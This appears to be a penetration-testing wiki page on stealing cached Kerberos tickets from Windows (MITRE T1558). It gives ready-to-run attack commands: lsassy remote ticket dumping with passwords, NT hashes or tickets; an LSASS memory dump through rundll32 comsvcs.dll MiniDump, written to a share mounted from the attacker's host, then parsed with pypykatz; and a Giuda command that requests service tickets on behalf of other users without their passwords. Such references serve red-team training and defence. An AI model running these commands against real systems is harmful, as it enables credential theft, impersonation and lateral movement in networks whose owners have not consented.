Infiltr8 Forum GitHub

Cached Kerberos tickets

MITRE ATT&CK™ Steal or Forge Kerberos Tickets - Technique T1558

Theory

In Windows, Kerberos tickets are handled and stored by the lsass (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to communicate with lsass and ask for them. As a non-administrative user only owned tickets can be fetched, however, as machine administrator, all of them can be harvested using tools like Mimikatz, Rubeus or Giuda.

Practice

Enumerate

Klist is a native Windows tool that can display a list of currently cached Kerberos tickets. 

#Enumerate TGT and TGS
klist tickets

#Enumerate sessions
klist sessions

Dump tickets

From an Unix attacking machine, we can remotely dump tickets using lsassy (python).

# With a password
lsassy -d <DOMAIN.LOCAL> -u <USER> -p <PASSWORD> <TARGET> -K '/tmp/kerberos_tickets'

# With PtH
lsassy -d <DOMAIN.LOCAL> -u <USER> -H <NTHash> <TARGET> -K '/tmp/kerberos_tickets'

# With PtT
lsassy -k <TARGET> -K '/tmp/kerberos_tickets'

We also can do it manually by dumping LSASS memory using one of this techniques, exfiltrate the dump on our attacking machine, and then retrieve tickets using pypykatz.

# Example of a dump where Z: is mounted on the attacking host
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid Z:\lsass.dmp full

# Get Tickets
pypykatz lsa minidump /path/to/lsass.dmp -k /tmp/kerberos_tickets

Ask a TGS

Using tools like Giuda , we can avoid dumping LSASS memory. With the SeTcbPrivilege, we can read LSA storage, extract the SESSION KEY from TGT, and forge a request asking for a TGS; We must use LUID instead of Username.

Giuda can be use to requests a TGS on behalf of another user (without password)

#Request a TGS
.\guida.exe -gettgs -luid:<LogonID> -msdsspn:<SPN>

#Example
.\guida.exe -gettgs -luid:0x1875dc -msdsspn:HOST/dc01.lab.local

Resources

Last updated